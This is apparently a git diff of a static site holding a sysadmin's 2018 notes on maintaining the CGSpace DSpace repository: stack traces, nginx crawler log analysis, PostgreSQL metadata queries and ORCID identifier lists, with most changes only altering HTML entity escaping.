<pre tabindex="0"><code>03-Jul-2018 19:51:37.272 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4792)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5256)
@ -217,7 +217,7 @@ dspace=# commit;
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/aorth/dspace/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#3f6c3e6a&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
</code></pre><ul>
<li>Gotta check that out later&hellip;</li>
</ul>
@ -249,7 +249,7 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>Abenet wants to be able to search by journal title (dc.source) in the advanced Discovery search so I opened an issue for it (<a href="https://github.com/ilri/DSpace/issues/384">#384</a>)</li>
<li>I regenerated the list of names for all our ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; /tmp/2018-07-08-orcids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt -d
</code></pre><ul>
<li>But after comparing to the existing list of names I didn&rsquo;t see much change, so I just ignored it</li>
@ -259,7 +259,7 @@ $ ./resolve-orcids.py -i /tmp/2018-07-08-orcids.txt -o /tmp/2018-07-08-names.txt
<li>Uptime Robot said that CGSpace was down for two minutes early this morning but I don&rsquo;t see anything in Tomcat logs or dmesg</li>
<li>Uptime Robot said that CGSpace was down for two minutes again later in the day, and this time I saw a memory error in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-557&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-557&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m not sure if it&rsquo;s the same error, but I see this in DSpace&rsquo;s <code>solr.log</code>:</li>
</ul>
@ -274,7 +274,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>I got a message from Linode tonight that CPU usage was high on CGSpace for the past few hours around 8PM GMT</li>
<li>Looking in the nginx logs I see the top ten IP addresses active today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;09/Jul/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;09/Jul/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1691 40.77.167.84
1701 40.77.167.69
1718 50.116.102.77
@ -288,7 +288,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Of those, <em>all</em> except <code>70.32.83.92</code> and <code>50.116.102.77</code> are <em>NOT</em> re-using their Tomcat sessions, for example from the XMLUI logs:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-07-09
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-07-09
4435
</code></pre><ul>
<li><code>95.108.181.88</code> appears to be Yandex, so I dunno why it&rsquo;s creating so many sessions, as its user agent should match Tomcat&rsquo;s Crawler Session Manager Valve</li>
@ -314,7 +314,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Linode sent an alert about CPU usage on CGSpace again, about 13:00UTC</li>
<li>These are the top ten users in the last two hours:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Jul/2018:(11|12|13)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Jul/2018:(11|12|13)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
81 193.95.22.113
82 50.116.102.77
112 40.77.167.90
@ -328,7 +328,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
</code></pre><ul>
<li>Looks like <code>213.139.52.250</code> is Moayad testing his new CGSpace vizualization thing:</li>
</ul>
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &quot;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&quot; 200 53750 &quot;http://localhost:4200/&quot; &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&quot;
<pre tabindex="0"><code>213.139.52.250 - - [10/Jul/2018:13:39:41 +0000] &#34;GET /bitstream/handle/10568/75668/dryad.png HTTP/2.0&#34; 200 53750 &#34;http://localhost:4200/&#34; &#34;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36&#34;
</code></pre><ul>
<li>He said there was a bug that caused his app to request a bunch of invalid URLs</li>
<li>I&rsquo;ll have to keep and eye on this and see how their platform evolves</li>
@ -349,7 +349,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>Uptime Robot said that CGSpace went down a few times last night, around 10:45 PM and 12:30 AM</li>
<li>Here are the top ten IPs from last night and this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;11/Jul/2018:22&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;11/Jul/2018:22&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
48 66.249.64.91
50 35.227.26.162
57 157.55.39.234
@ -360,7 +360,7 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
97 183.128.40.185
97 240e:f0:44:fa53:745a:8afe:d221:1232
3634 208.110.72.10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;12/Jul/2018:00&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;12/Jul/2018:00&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
25 216.244.66.198
38 40.77.167.185
46 66.249.64.93
@ -377,21 +377,21 @@ org.apache.solr.client.solrj.SolrServerException: IOException occured when talki
<li>A brief Google search doesn&rsquo;t turn up any information about what this bot is, but lots of users complaining about it</li>
<li>This bot does make a lot of requests all through the day, although it seems to re-use its Tomcat session:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
17098 208.110.72.10
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-11
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-11
1161
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10' dspace.log.2018-07-12
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=208.110.72.10&#39; dspace.log.2018-07-12
1885
</code></pre><ul>
<li>I think the problem is that, despite the bot requesting <code>robots.txt</code>, it almost exlusively requests dynamic pages from <code>/discover</code>:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep -o -E &quot;GET /(browse|discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep -o -E &#34;GET /(browse|discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
13364 GET /discover
993 GET /search-filter
804 GET /browse
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;Pcore-HTTP&quot; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &quot;GET /robots.txt HTTP/1.1&quot; 200 1301 &quot;https://cgspace.cgiar.org/robots.txt&quot; &quot;Pcore-HTTP/v0.44.0&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;Pcore-HTTP&#34; | grep robots
208.110.72.10 - - [12/Jul/2018:00:22:28 +0000] &#34;GET /robots.txt HTTP/1.1&#34; 200 1301 &#34;https://cgspace.cgiar.org/robots.txt&#34; &#34;Pcore-HTTP/v0.44.0&#34;
</code></pre><ul>
<li>So this bot is just like Baiduspider, and I need to add it to the nginx rate limiting</li>
<li>I&rsquo;ll also add it to Tomcat&rsquo;s Crawler Session Manager Valve to force the re-use of a common Tomcat sesssion for all crawlers just in case</li>
@ -408,7 +408,7 @@ $ csvcut -c 1 &lt; /tmp/affiliations.csv &gt; /tmp/affiliations-1.csv
<ul>
<li>Generate a list of affiliations for Peter and Abenet to go over so we can batch correct them before we deploy the new data visualization dashboard:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv header;
COPY 4518
</code></pre><h2 id="2018-07-15">2018-07-15</h2>
<ul>
@ -438,14 +438,14 @@ OAI 2.0 manager action ended. It took 697 seconds.
<li>I need to ask the dspace-tech mailing list if the nightly OAI import catches the case of old items that have had metadata or mappings change</li>
<li>ICARDA sent me a list of the ORCID iDs they have in the MEL system and it looks like almost 150 are new and unique to us!</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1020
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1158
</code></pre><ul>
<li>I combined the two lists and regenerated the names for all our the ORCID iDs using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-07-15-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolved-orcids.txt -d
</code></pre><ul>
<li>Then I added the XML formatting for controlled vocabularies, sorted the list with GNU sort in vim via <code>% !sort</code> and then checked the formatting with tidy:</li>
@ -465,16 +465,16 @@ $ ./resolve-orcids.py -i /tmp/2018-07-15-orcid-ids.txt -o /tmp/2018-07-15-resolv
<li>For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I see 1500 requsts</li>
<li>In there I see two bots making about 750 requests each, and this one is probably Altmetric:</li>
</ul>
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&quot; 200 58653 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&quot; 200 67950 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
<pre tabindex="0"><code>178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1&#34; 200 58653 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////200 HTTP/1.1&#34; 200 67950 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
...
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &quot;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&quot; 20 0 25049 &quot;-&quot; &quot;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&quot;
178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] &#34;GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////73900 HTTP/1.1&#34; 20 0 25049 &#34;-&#34; &#34;Apache-HttpClient/4.5.2 (Java/1.8.0_121)&#34;
</code></pre><ul>
<li>So if they are getting 100 records per OAI request it would take them 739 requests</li>
<li>I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve&hellip; does OAI use Tomcat sessions?</li>
<li>Appears not:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100'
<pre tabindex="0"><code>$ http --print Hh &#39;https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100&#39;
GET /oai/request?verb=ListRecords&amp;resumptionToken=oai_dc////100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -523,17 +523,17 @@ X-XSS-Protection: 1; mode=block
<li>Still discussing dates with IWMI</li>
<li>I looked in the database to see the breakdown of date formats used in <code>dc.date.issued</code>, ie YYYY, YYYY-MM, or YYYY-MM-DD:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}$&#39;;
count
-------
53292
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}$&#39;;
count
-------
3818
(1 row)
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ &#39;^[0-9]{4}-[0-9]{2}-[0-9]{2}$&#39;;
count
-------
17357

View File

@ -46,7 +46,7 @@ Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did
The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes
I ran all system updates on DSpace Test and rebooted it
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -179,13 +179,13 @@ I ran all system updates on DSpace Test and rebooted it
<li>I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors</li>
<li>Finally I did a test run with the <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t correct -m 211
$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2018-08-16">2018-08-16</h2>
<ul>
<li>Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv;
</code></pre><ul>
<li>Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month</li>
<li>I might need to overhaul the <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration</li>
@ -198,14 +198,14 @@ $ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspac
<pre tabindex="0"><code>$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><h2 id="2018-08-19">2018-08-19</h2>
<ul>
<li>Keep working on the CIAT ORCID identifiers from Elizabeth</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&quot;) I will just tag them with ORCID identifiers too</li>
<li>In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie &ldquo;Schultze-Kraft, Rainer&rdquo; and &ldquo;Schultze-Kraft, R.&rdquo;) I will just tag them with ORCID identifiers too</li>
<li>This is less obvious and more error prone with names like &ldquo;Peters&rdquo; where there are many more authors</li>
<li>I see some errors in the variations of names as well, for example:</li>
</ul>
@ -221,37 +221,37 @@ Verchot, Louis V.
<li>In the end, I&rsquo;ll run the following CSV with my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Campbell, Bruce&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, Bruce M.&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Campbell, B.M&quot;,Bruce M Campbell: 0000-0002-0123-4859
&quot;Peters, Michael&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Peters, M.K.&quot;,Michael Peters: 0000-0003-4237-3916
&quot;Tamene, Lulseged&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Desta, Lulseged Tamene&quot;,Lulseged Tamene: 0000-0002-3806-8890
&quot;Läderach, Peter&quot;,Peter Läderach: 0000-0001-8708-6318
&quot;Lundy, Mark&quot;,Mark Lundy: 0000-0002-5241-3777
&quot;Schultze-Kraft, Rainer&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Schultze-Kraft, R.&quot;,Rainer Schultze-Kraft: 0000-0002-4563-0044
&quot;Verchot, Louis&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L. V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, L.V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, LV&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Verchot, Louis V.&quot;,Louis Verchot: 0000-0001-8309-6754
&quot;Mukankusi, Clare&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Mukankusi, Clare M.&quot;,Clare Mukankusi: 0000-0001-7837-4545
&quot;Wyckhuys, Kris&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A. G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Wyckhuys, Kris A.G.&quot;,Kris Wyckhuys: 0000-0003-0922-488X
&quot;Chirinda, Ngonidzashe&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Chirinda, Ngoni&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&quot;Ngonidzashe, Chirinda&quot;,Ngonidzashe Chirinda: 0000-0002-4213-6294
&#34;Campbell, Bruce&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, Bruce M.&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Campbell, B.M&#34;,Bruce M Campbell: 0000-0002-0123-4859
&#34;Peters, Michael&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Peters, M.K.&#34;,Michael Peters: 0000-0003-4237-3916
&#34;Tamene, Lulseged&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Desta, Lulseged Tamene&#34;,Lulseged Tamene: 0000-0002-3806-8890
&#34;Läderach, Peter&#34;,Peter Läderach: 0000-0001-8708-6318
&#34;Lundy, Mark&#34;,Mark Lundy: 0000-0002-5241-3777
&#34;Schultze-Kraft, Rainer&#34;,Rainer Schultze-Kraft: 0000-0002-4563-0044
